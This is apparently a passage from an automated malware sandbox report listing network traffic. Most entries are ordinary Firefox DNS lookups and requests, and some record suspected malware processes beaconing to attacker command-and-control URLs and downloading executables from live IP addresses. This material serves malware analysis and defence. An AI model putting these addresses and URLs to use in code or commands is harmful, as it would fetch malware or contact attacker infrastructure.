                  if-none-match: W/"5388-z4f7VxffVE065aqbcDCq/QMZNSc"
                  te: trailers
                • flag-us
                  DNS
                  prod.pocket.prod.cloudops.mozgcp.net
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  prod.pocket.prod.cloudops.mozgcp.net
                  IN A
                  Response
                  prod.pocket.prod.cloudops.mozgcp.net
                  IN A
                  34.120.5.221
                • flag-us
                  DNS
                  prod.ads.prod.webservices.mozgcp.net
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  prod.ads.prod.webservices.mozgcp.net
                  IN A
                  Response
                  prod.ads.prod.webservices.mozgcp.net
                  IN A
                  34.117.188.166
                • flag-us
                  DNS
                  youtube.com
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  youtube.com
                  IN AAAA
                  Response
                  youtube.com
                  IN AAAA
                  2a00:1450:4009:816::200e
                • flag-us
                  DNS
                  prod.pocket.prod.cloudops.mozgcp.net
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  prod.pocket.prod.cloudops.mozgcp.net
                  IN AAAA
                  Response
                  prod.pocket.prod.cloudops.mozgcp.net
                  IN AAAA
                  2600:1901:0:524c::
                • flag-us
                  DNS
                  prod.ads.prod.webservices.mozgcp.net
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  prod.ads.prod.webservices.mozgcp.net
                  IN AAAA
                  Response
                • flag-us
                  DNS
                  prod.content-signature-chains.prod.webservices.mozgcp.net
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  prod.content-signature-chains.prod.webservices.mozgcp.net
                  IN A
                  Response
                  prod.content-signature-chains.prod.webservices.mozgcp.net
                  IN A
                  34.160.144.191
                • flag-us
                  DNS
                  prod.content-signature-chains.prod.webservices.mozgcp.net
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  prod.content-signature-chains.prod.webservices.mozgcp.net
                  IN AAAA
                  Response
                  prod.content-signature-chains.prod.webservices.mozgcp.net
                  IN AAAA
                  2600:1901:0:92a9::
                • flag-us
                  DNS
                  shavar.prod.mozaws.net
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  shavar.prod.mozaws.net
                  IN A
                  Response
                  shavar.prod.mozaws.net
                  IN A
                  52.32.237.164
                  shavar.prod.mozaws.net
                  IN A
                  52.33.23.190
                  shavar.prod.mozaws.net
                  IN A
                  44.226.106.83
                • flag-us
                  DNS
                  shavar.prod.mozaws.net
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  shavar.prod.mozaws.net
                  IN AAAA
                  Response
                • flag-us
                  DNS
                  www.youtube.com
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  www.youtube.com
                  IN A
                  Response
                  www.youtube.com
                  IN CNAME
                  youtube-ui.l.google.com
                • flag-us
                  DNS
                  prod.remote-settings.prod.webservices.mozgcp.net
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  prod.remote-settings.prod.webservices.mozgcp.net
                  IN A
                  Response
                  prod.remote-settings.prod.webservices.mozgcp.net
                  IN A
                  34.149.100.209
                • flag-us
                  DNS
                  youtube-ui.l.google.com
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  youtube-ui.l.google.com
                  IN A
                  Response
                  youtube-ui.l.google.com
                  IN A
                  142.250.178.14
                  youtube-ui.l.google.com
                  IN A
                  172.217.169.14
                  youtube-ui.l.google.com
                  IN A
                  142.250.180.14
                  youtube-ui.l.google.com
                  IN A
                  142.250.187.206
                  youtube-ui.l.google.com
                  IN A
                  172.217.169.78
                  youtube-ui.l.google.com
                  IN A
                  142.250.200.14
                  youtube-ui.l.google.com
                  IN A
                  216.58.204.78
                  youtube-ui.l.google.com
                  IN A
                  142.250.179.238
                  youtube-ui.l.google.com
                  IN A
                  216.58.201.110
                  youtube-ui.l.google.com
                  IN A
                  142.250.187.238
                  youtube-ui.l.google.com
                  IN A
                  172.217.169.46
                  youtube-ui.l.google.com
                  IN A
                  172.217.16.238
                  youtube-ui.l.google.com
                  IN A
                  216.58.213.14
                  youtube-ui.l.google.com
                  IN A
                  216.58.212.206
                  youtube-ui.l.google.com
                  IN A
                  142.250.200.46
                • flag-us
                  DNS
                  prod.remote-settings.prod.webservices.mozgcp.net
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  prod.remote-settings.prod.webservices.mozgcp.net
                  IN AAAA
                  Response
                • flag-us
                  DNS
                  youtube-ui.l.google.com
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  youtube-ui.l.google.com
                  IN AAAA
                  Response
                  youtube-ui.l.google.com
                  IN AAAA
                  2a00:1450:4009:819::200e
                  youtube-ui.l.google.com
                  IN AAAA
                  2a00:1450:4009:817::200e
                  youtube-ui.l.google.com
                  IN AAAA
                  2a00:1450:4009:80a::200e
                  youtube-ui.l.google.com
                  IN AAAA
                  2a00:1450:4009:818::200e
                • flag-us
                  DNS
                  consent.youtube.com
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  consent.youtube.com
                  IN A
                  Response
                  consent.youtube.com
                  IN A
                  142.250.200.14
                • flag-gb
                  GET
                  https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1
                  firefox.exe
                  Remote address:
                  142.250.200.14:443
                  Request
                  GET /m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1 HTTP/2.0
                  host: consent.youtube.com
                  user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                  accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                  accept-language: en-US,en;q=0.5
                  accept-encoding: gzip, deflate, br
                  cookie: SOCS=CAAaBgiAoM66Bg
                  cookie: YSC=XAJHfiMqzLQ
                  cookie: __Secure-YEC=Cgt5cVZqVnpxYWY5NCi57c66BjIKCgJHQhIEGgAgFw%3D%3D
                  cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgFw%3D%3D
                  upgrade-insecure-requests: 1
                  sec-fetch-dest: document
                  sec-fetch-mode: navigate
                  sec-fetch-site: none
                  sec-fetch-user: ?1
                  te: trailers
                • flag-us
                  DNS
                  consent.youtube.com
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  consent.youtube.com
                  IN A
                  Response
                  consent.youtube.com
                  IN A
                  142.250.200.14
                • flag-us
                  DNS
                  consent.youtube.com
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  consent.youtube.com
                  IN AAAA
                  Response
                  consent.youtube.com
                  IN AAAA
                  2a00:1450:4009:822::200e
                • flag-us
                  DNS
                  firefox-settings-attachments.cdn.mozilla.net
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  firefox-settings-attachments.cdn.mozilla.net
                  IN A
                  Response
                  firefox-settings-attachments.cdn.mozilla.net
                  IN CNAME
                  attachments.prod.remote-settings.prod.webservices.mozgcp.net
                  attachments.prod.remote-settings.prod.webservices.mozgcp.net
                  IN A
                  34.117.121.53
                • flag-us
                  DNS
                  attachments.prod.remote-settings.prod.webservices.mozgcp.net
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  attachments.prod.remote-settings.prod.webservices.mozgcp.net
                  IN A
                  Response
                  attachments.prod.remote-settings.prod.webservices.mozgcp.net
                  IN A
                  34.117.121.53
                • flag-us
                  DNS
                  attachments.prod.remote-settings.prod.webservices.mozgcp.net
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  attachments.prod.remote-settings.prod.webservices.mozgcp.net
                  IN AAAA
                  Response
                • flag-us
                  DNS
                  www.google.com
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  www.google.com
                  IN A
                  Response
                  www.google.com
                  IN A
                  142.250.187.196
                • flag-gb
                  GET
                  https://www.google.com/favicon.ico
                  firefox.exe
                  Remote address:
                  142.250.187.196:443
                  Request
                  GET /favicon.ico HTTP/2.0
                  host: www.google.com
                  user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                  accept: image/avif,image/webp,*/*
                  accept-language: en-US,en;q=0.5
                  accept-encoding: gzip, deflate, br
                  referer: https://consent.youtube.com/
                  sec-fetch-dest: image
                  sec-fetch-mode: no-cors
                  sec-fetch-site: cross-site
                  te: trailers
                • flag-us
                  DNS
                  www.google.com
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  www.google.com
                  IN A
                  Response
                  www.google.com
                  IN A
                  142.250.187.196
                • flag-us
                  DNS
                  www.google.com
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  www.google.com
                  IN AAAA
                  Response
                  www.google.com
                  IN AAAA
                  2a00:1450:4009:81f::2004
                • flag-us
                  DNS
                  consent.youtube.com
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  consent.youtube.com
                  IN A
                  Response
                  consent.youtube.com
                  IN A
                  142.250.200.14
                • flag-us
                  DNS
                  consent.youtube.com
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  consent.youtube.com
                  IN A
                  Response
                  consent.youtube.com
                  IN A
                  142.250.200.14
                • flag-us
                  DNS
                  prod.balrog.prod.cloudops.mozgcp.net
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  prod.balrog.prod.cloudops.mozgcp.net
                  IN A
                  Response
                  prod.balrog.prod.cloudops.mozgcp.net
                  IN A
                  35.244.181.201
                • flag-us
                  DNS
                  prod.balrog.prod.cloudops.mozgcp.net
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  prod.balrog.prod.cloudops.mozgcp.net
                  IN AAAA
                  Response
                • flag-us
                  DNS
                  prod.remote-settings.prod.webservices.mozgcp.net
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  prod.remote-settings.prod.webservices.mozgcp.net
                  IN A
                  Response
                  prod.remote-settings.prod.webservices.mozgcp.net
                  IN A
                  34.149.100.209
                • flag-us
                  DNS
                  ciscobinary.openh264.org
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  ciscobinary.openh264.org
                  IN A
                  Response
                  ciscobinary.openh264.org
                  IN CNAME
                  a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com
                  a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com
                  IN CNAME
                  a17.rackcdn.com
                  a17.rackcdn.com
                  IN CNAME
                  a17.rackcdn.com.mdc.edgesuite.net
                  a17.rackcdn.com.mdc.edgesuite.net
                  IN CNAME
                  a19.dscg10.akamai.net
                  a19.dscg10.akamai.net
                  IN A
                  88.221.134.209
                  a19.dscg10.akamai.net
                  IN A
                  88.221.134.155
                • flag-gb
                  GET
                  http://ciscobinary.openh264.org/openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip
                  firefox.exe
                  Remote address:
                  88.221.134.209:80
                  Request
                  GET /openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip HTTP/1.1
                  Host: ciscobinary.openh264.org
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                  Accept: */*
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Connection: keep-alive
                  Response
                  HTTP/1.1 200 OK
                  Last-Modified: Fri, 08 Nov 2024 02:52:28 GMT
                  ETag: 85430baed3398695717b0263807cf97c
                  Content-Length: 453023
                  Accept-Ranges: bytes
                  X-Timestamp: 1731034347.00215
                  Content-Type: application/zip
                  X-Trans-Id: tx264693c458e9421d8a991-006730bfe7dfw1
                  Cache-Control: public, max-age=61851
                  Expires: Sat, 07 Dec 2024 19:56:26 GMT
                  Date: Sat, 07 Dec 2024 02:45:35 GMT
                  Connection: keep-alive
                • flag-us
                  DNS
                  a19.dscg10.akamai.net
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  a19.dscg10.akamai.net
                  IN A
                  Response
                  a19.dscg10.akamai.net
                  IN A
                  88.221.134.155
                  a19.dscg10.akamai.net
                  IN A
                  88.221.134.209
                • flag-us
                  DNS
                  a19.dscg10.akamai.net
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  a19.dscg10.akamai.net
                  IN AAAA
                  Response
                  a19.dscg10.akamai.net
                  IN AAAA
                  2a02:26f0:a1::58dd:869b
                  a19.dscg10.akamai.net
                  IN AAAA
                  2a02:26f0:a1::58dd:86d1
                • flag-us
                  DNS
                  redirector.gvt1.com
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  redirector.gvt1.com
                  IN A
                  Response
                  redirector.gvt1.com
                  IN A
                  142.250.180.14
                • flag-us
                  DNS
                  redirector.gvt1.com
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  redirector.gvt1.com
                  IN A
                  Response
                  redirector.gvt1.com
                  IN A
                  142.250.180.14
                • flag-us
                  DNS
                  redirector.gvt1.com
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  redirector.gvt1.com
                  IN AAAA
                  Response
                  redirector.gvt1.com
                  IN AAAA
                  2a00:1450:4009:81e::200e
                • flag-us
                  DNS
                  r1---sn-5hnekn76.gvt1.com
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  r1---sn-5hnekn76.gvt1.com
                  IN A
                  Response
                  r1---sn-5hnekn76.gvt1.com
                  IN CNAME
                  r1.sn-5hnekn76.gvt1.com
                  r1.sn-5hnekn76.gvt1.com
                  IN A
                  209.85.226.6
                • flag-us
                  DNS
                  r1.sn-5hnekn76.gvt1.com
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  r1.sn-5hnekn76.gvt1.com
                  IN A
                  Response
                  r1.sn-5hnekn76.gvt1.com
                  IN A
                  209.85.226.6
                • flag-us
                  DNS
                  r1.sn-5hnekn76.gvt1.com
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  r1.sn-5hnekn76.gvt1.com
                  IN AAAA
                  Response
                  r1.sn-5hnekn76.gvt1.com
                  IN AAAA
                  2a00:1450:400e::6
                • flag-us
                  DNS
                  play.google.com
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  play.google.com
                  IN A
                  Response
                  play.google.com
                  IN A
                  142.250.179.238
                • flag-gb
                  POST
                  https://play.google.com/log?hasfast=true&authuser=0&format=json
                  firefox.exe
                  Remote address:
                  142.250.179.238:443
                  Request
                  POST /log?hasfast=true&authuser=0&format=json HTTP/2.0
                  host: play.google.com
                  user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                  accept: */*
                  accept-language: en-US,en;q=0.5
                  accept-encoding: gzip, deflate, br
                  referer: https://consent.youtube.com/
                  content-type: text/plain;charset=UTF-8
                  content-length: 743
                  origin: https://consent.youtube.com
                  sec-fetch-dest: empty
                  sec-fetch-mode: no-cors
                  sec-fetch-site: cross-site
                  te: trailers
                • flag-us
                  DNS
                  play.google.com
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  play.google.com
                  IN A
                  Response
                  play.google.com
                  IN A
                  142.250.179.238
                • flag-us
                  DNS
                  play.google.com
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  play.google.com
                  IN AAAA
                  Response
                  play.google.com
                  IN AAAA
                  2a00:1450:4009:81d::200e
                • flag-us
                  DNS
                  consent.youtube.com
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  consent.youtube.com
                  IN A
                  Response
                  consent.youtube.com
                  IN A
                  142.250.200.14
                • flag-us
                  DNS
                  consent.youtube.com
                  firefox.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  consent.youtube.com
                  IN A
                  Response
                  consent.youtube.com
                  IN A
                  142.250.200.14
                • 185.215.113.43:80
                  http://185.215.113.43/Zu7JuNko/index.php
                  http
                  skotes.exe
                  2.2kB
                  2.0kB
                  22
                  12

                  HTTP Request

                  POST http://185.215.113.43/Zu7JuNko/index.php

                  HTTP Response

                  200

                  HTTP Request

                  POST http://185.215.113.43/Zu7JuNko/index.php

                  HTTP Response

                  200

                  HTTP Request

                  POST http://185.215.113.43/Zu7JuNko/index.php

                  HTTP Response

                  200

                  HTTP Request

                  POST http://185.215.113.43/Zu7JuNko/index.php

                  HTTP Response

                  200

                  HTTP Request

                  POST http://185.215.113.43/Zu7JuNko/index.php

                  HTTP Response

                  200

                  HTTP Request

                  POST http://185.215.113.43/Zu7JuNko/index.php

                  HTTP Response

                  200
                • 185.215.113.16:80
                  http://185.215.113.16/off/random.exe
                  http
                  skotes.exe
                  221.6kB
                  11.1MB
                  4448
                  7922

                  HTTP Request

                  GET http://185.215.113.16/luma/random.exe

                  HTTP Response

                  200

                  HTTP Request

                  GET http://185.215.113.16/steam/random.exe

                  HTTP Response

                  200

                  HTTP Request

                  GET http://185.215.113.16/well/random.exe

                  HTTP Response

                  200

                  HTTP Request

                  GET http://185.215.113.16/off/random.exe

                  HTTP Response

                  200
                • 104.21.16.9:443
                  https://atten-supporse.biz/api
                  tls, http
                  d1eb0cd776.exe
                  982 B
                  4.4kB
                  9
                  9

                  HTTP Request

                  POST https://atten-supporse.biz/api

                  HTTP Response

                  200
                • 172.67.162.65:443
                  https://se-blurry.biz/api
                  tls, http
                  d1eb0cd776.exe
                  977 B
                  4.3kB
                  9
                  9

                  HTTP Request

                  POST https://se-blurry.biz/api

                  HTTP Response

                  200
                • 172.67.136.167:443
                  https://zinc-sneark.biz/api
                  tls, http
                  d1eb0cd776.exe
                  1.7kB
                  9.9kB
                  14
                  16

                  HTTP Request

                  POST https://zinc-sneark.biz/api

                  HTTP Response

                  403

                  HTTP Request

                  POST https://zinc-sneark.biz/api

                  HTTP Response

                  200
                • 185.215.113.206:80
                  http://185.215.113.206/c4becf79229cb002.php
                  http
                  165fa3ed5f.exe
                  727 B
                  625 B
                  5
                  5

                  HTTP Request

                  GET http://185.215.113.206/

                  HTTP Response

                  200

                  HTTP Request

                  POST http://185.215.113.206/c4becf79229cb002.php

                  HTTP Response

                  200
                • 216.58.213.14:443
                  https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
                  tls, http2
                  firefox.exe
                  1.9kB
                  9.0kB
                  14
                  19

                  HTTP Request

                  GET https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
                • 34.120.5.221:443
                  https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30
                  tls, http2
                  firefox.exe
                  2.0kB
                  12.9kB
                  17
                  18

                  HTTP Request

                  GET https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30
                • 172.217.169.78:443
                  www.youtube.com
                  tls
                  firefox.exe
                  977 B
                  6.9kB
                  10
                  8
                • 127.0.0.1:49278
                  firefox.exe
                • 127.0.0.1:49286
                  firefox.exe
                • 142.250.200.14:443
                  https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1
                  tls, http2
                  firefox.exe
                  2.9kB
                  65.2kB
                  32
                  59

                  HTTP Request

                  GET https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1
                • 34.117.121.53:443
                  firefox-settings-attachments.cdn.mozilla.net
                  tls
                  firefox.exe
                  1.8kB
                  21.3kB
                  19
                  26
                • 142.250.187.196:443
                  https://www.google.com/favicon.ico
                  tls, http2
                  firefox.exe
                  1.8kB
                  7.5kB
                  14
                  18

                  HTTP Request

                  GET https://www.google.com/favicon.ico
                • 88.221.134.209:80
                  http://ciscobinary.openh264.org/openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip
                  http
                  firefox.exe
                  5.5kB
                  467.5kB
                  114
                  349

                  HTTP Request

                  GET http://ciscobinary.openh264.org/openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip

                  HTTP Response

                  200
                • 142.250.180.14:443
                  redirector.gvt1.com
                  tls
                  firefox.exe
                  1.6kB
                  8.9kB
                  16
                  21
                • 209.85.226.6:443
                  r1---sn-5hnekn76.gvt1.com
                  tls
                  firefox.exe
                  124.3kB
                  8.7MB
                  2288
                  6256
                • 142.250.179.238:443
                  https://play.google.com/log?hasfast=true&authuser=0&format=json
                  tls, http2
                  firefox.exe
                  2.8kB
                  8.7kB
                  18
                  20

                  HTTP Request

                  POST https://play.google.com/log?hasfast=true&authuser=0&format=json
                • 8.8.8.8:53
                  atten-supporse.biz
                  dns
                  d1eb0cd776.exe
                  64 B
                  96 B
                  1
                  1

                  DNS Request

                  atten-supporse.biz

                  DNS Response

                  104.21.16.9
                  172.67.165.166

                • 8.8.8.8:53
                  se-blurry.biz
                  dns
                  d1eb0cd776.exe
                  59 B
                  91 B
                  1
                  1

                  DNS Request

                  se-blurry.biz

                  DNS Response

                  172.67.162.65
                  104.21.81.153

                • 8.8.8.8:53
                  zinc-sneark.biz
                  dns
                  d1eb0cd776.exe
                  61 B
                  93 B
                  1
                  1

                  DNS Request

                  zinc-sneark.biz

                  DNS Response

                  172.67.136.167
                  104.21.62.142

                • 8.8.8.8:53
                  youtube.com
                  dns
                  firefox.exe
                  57 B
                  73 B
                  1
                  1

                  DNS Request

                  youtube.com

                  DNS Response

                  216.58.213.14

                • 8.8.8.8:53
                  spocs.getpocket.com
                  dns
                  firefox.exe
                  65 B
                  131 B
                  1
                  1

                  DNS Request

                  spocs.getpocket.com

                  DNS Response

                  34.117.188.166

                • 8.8.8.8:53
                  getpocket.cdn.mozilla.net
                  dns
                  firefox.exe
                  71 B
                  174 B
                  1
                  1

                  DNS Request

                  getpocket.cdn.mozilla.net

                  DNS Response

                  34.120.5.221

                • 8.8.8.8:53
                  youtube.com
                  dns
                  firefox.exe
                  57 B
                  73 B
                  1
                  1

                  DNS Request

                  youtube.com

                  DNS Response

                  216.58.213.14

                • 8.8.8.8:53
                  prod.pocket.prod.cloudops.mozgcp.net
                  dns
                  firefox.exe
                  82 B
                  98 B
                  1
                  1

                  DNS Request

                  prod.pocket.prod.cloudops.mozgcp.net

                  DNS Response

                  34.120.5.221

                • 8.8.8.8:53
                  prod.ads.prod.webservices.mozgcp.net
                  dns
                  firefox.exe
                  82 B
                  98 B
                  1
                  1

                  DNS Request

                  prod.ads.prod.webservices.mozgcp.net

                  DNS Response

                  34.117.188.166

                • 8.8.8.8:53
                  youtube.com
                  dns
                  firefox.exe
                  57 B
                  85 B
                  1
                  1

                  DNS Request

                  youtube.com

                  DNS Response

                  2a00:1450:4009:816::200e

                • 8.8.8.8:53
                  prod.pocket.prod.cloudops.mozgcp.net
                  dns
                  firefox.exe
                  82 B
                  110 B
                  1
                  1

                  DNS Request

                  prod.pocket.prod.cloudops.mozgcp.net

                  DNS Response

                  2600:1901:0:524c::

                • 8.8.8.8:53
                  prod.ads.prod.webservices.mozgcp.net
                  dns
                  firefox.exe
                  82 B
                  175 B
                  1
                  1

                  DNS Request

                  prod.ads.prod.webservices.mozgcp.net

                • 8.8.8.8:53
                  prod.content-signature-chains.prod.webservices.mozgcp.net
                  dns
                  firefox.exe
                  103 B
                  119 B
                  1
                  1

                  DNS Request

                  prod.content-signature-chains.prod.webservices.mozgcp.net

                  DNS Response

                  34.160.144.191

                • 8.8.8.8:53
                  prod.content-signature-chains.prod.webservices.mozgcp.net
                  dns
                  firefox.exe
                  103 B
                  131 B
                  1
                  1

                  DNS Request

                  prod.content-signature-chains.prod.webservices.mozgcp.net

                  DNS Response

                  2600:1901:0:92a9::

                • 8.8.8.8:53
                  shavar.prod.mozaws.net
                  dns
                  firefox.exe
                  68 B
                  116 B
                  1
                  1

                  DNS Request

                  shavar.prod.mozaws.net

                  DNS Response

                  52.32.237.164
                  52.33.23.190
                  44.226.106.83

                • 8.8.8.8:53
                  shavar.prod.mozaws.net
                  dns
                  firefox.exe
                  68 B
                  153 B
                  1
                  1

                  DNS Request

                  shavar.prod.mozaws.net

                • 216.58.213.14:443
                  youtube.com
                  https
                  firefox.exe
                  3.7kB
                  11.0kB
                  10
                  14
                • 8.8.8.8:53
                  www.youtube.com
                  dns
                  firefox.exe
                  61 B
                  335 B
                  1
                  1

                  DNS Request

                  www.youtube.com

                • 8.8.8.8:53
                  prod.remote-settings.prod.webservices.mozgcp.net
                  dns
                  firefox.exe
                  94 B
                  110 B
                  1
                  1

                  DNS Request

                  prod.remote-settings.prod.webservices.mozgcp.net

                  DNS Response

                  34.149.100.209

                • 8.8.8.8:53
                  youtube-ui.l.google.com
                  dns
                  firefox.exe
                  69 B
                  309 B
                  1
                  1

                  DNS Request

                  youtube-ui.l.google.com

                • 8.8.8.8:53
                  prod.remote-settings.prod.webservices.mozgcp.net
                  dns
                  firefox.exe
                  94 B
                  187 B
                  1
                  1

                  DNS Request

                  prod.remote-settings.prod.webservices.mozgcp.net

                • 8.8.8.8:53
                  youtube-ui.l.google.com
                  dns
                  firefox.exe
                  69 B
                  181 B
                  1
                  1

                  DNS Request

                  youtube-ui.l.google.com

                  DNS Response

                  2a00:1450:4009:819::200e
                  2a00:1450:4009:817::200e
                  2a00:1450:4009:80a::200e
                  2a00:1450:4009:818::200e

                • 172.217.169.78:443
                  youtube-ui.l.google.com
                  https
                  firefox.exe
                  3.3kB
                  9.2kB
                  7
                  9
                • 8.8.8.8:53
                  consent.youtube.com
                  dns
                  firefox.exe
                  65 B
                  81 B
                  1
                  1

                  DNS Request

                  consent.youtube.com

                  DNS Response

                  142.250.200.14

                • 8.8.8.8:53
                  consent.youtube.com
                  dns
                  firefox.exe
                  65 B
                  81 B
                  1
                  1

                  DNS Request

                  consent.youtube.com

                  DNS Response

                  142.250.200.14

                • 8.8.8.8:53
                  consent.youtube.com
                  dns
                  firefox.exe
                  65 B
                  93 B
                  1
                  1

                  DNS Request

                  consent.youtube.com

                  DNS Response

                  2a00:1450:4009:822::200e

                • 8.8.8.8:53
                  firefox-settings-attachments.cdn.mozilla.net
                  dns
                  firefox.exe
                  90 B
                  177 B
                  1
                  1

                  DNS Request

                  firefox-settings-attachments.cdn.mozilla.net

                  DNS Response

                  34.117.121.53

                • 8.8.8.8:53
                  attachments.prod.remote-settings.prod.webservices.mozgcp.net
                  dns
                  firefox.exe
                  106 B
                  122 B
                  1
                  1

                  DNS Request

                  attachments.prod.remote-settings.prod.webservices.mozgcp.net

                  DNS Response

                  34.117.121.53

                • 142.250.200.14:443
                  consent.youtube.com
                  https
                  firefox.exe
                  4.0kB
                  10.6kB
                  9
                  14
                • 8.8.8.8:53
                  attachments.prod.remote-settings.prod.webservices.mozgcp.net
                  dns
                  firefox.exe
                  106 B
                  199 B
                  1
                  1

                  DNS Request

                  attachments.prod.remote-settings.prod.webservices.mozgcp.net

                • 8.8.8.8:53
                  www.google.com
                  dns
                  firefox.exe
                  60 B
                  76 B
                  1
                  1

                  DNS Request

                  www.google.com

                  DNS Response

                  142.250.187.196

                • 8.8.8.8:53
                  www.google.com
                  dns
                  firefox.exe
                  60 B
                  76 B
                  1
                  1

                  DNS Request

                  www.google.com

                  DNS Response

                  142.250.187.196

                • 8.8.8.8:53
                  www.google.com
                  dns
                  firefox.exe
                  60 B
                  88 B
                  1
                  1

                  DNS Request

                  www.google.com

                  DNS Response

                  2a00:1450:4009:81f::2004

                • 142.250.187.196:443
                  www.google.com
                  https
                  firefox.exe
                  3.1kB
                  9.3kB
                  6
                  10
                • 8.8.8.8:53
                  consent.youtube.com
                  dns
                  firefox.exe
                  65 B
                  81 B
                  1
                  1

                  DNS Request

                  consent.youtube.com

                  DNS Response

                  142.250.200.14

                • 8.8.8.8:53
                  consent.youtube.com
                  dns
                  firefox.exe
                  65 B
                  81 B
                  1
                  1

                  DNS Request

                  consent.youtube.com

                  DNS Response

                  142.250.200.14

                • 8.8.8.8:53
                  prod.balrog.prod.cloudops.mozgcp.net
                  dns
                  firefox.exe
                  82 B
                  98 B
                  1
                  1

                  DNS Request

                  prod.balrog.prod.cloudops.mozgcp.net

                  DNS Response

                  35.244.181.201

                • 8.8.8.8:53
                  prod.balrog.prod.cloudops.mozgcp.net
                  dns
                  firefox.exe
                  82 B
                  175 B
                  1
                  1

                  DNS Request

                  prod.balrog.prod.cloudops.mozgcp.net

                • 8.8.8.8:53
                  prod.remote-settings.prod.webservices.mozgcp.net
                  dns
                  firefox.exe
                  94 B
                  110 B
                  1
                  1

                  DNS Request

                  prod.remote-settings.prod.webservices.mozgcp.net

                  DNS Response

                  34.149.100.209

                • 8.8.8.8:53
                  ciscobinary.openh264.org
                  dns
                  firefox.exe
                  70 B
                  286 B
                  1
                  1

                  DNS Request

                  ciscobinary.openh264.org

                  DNS Response

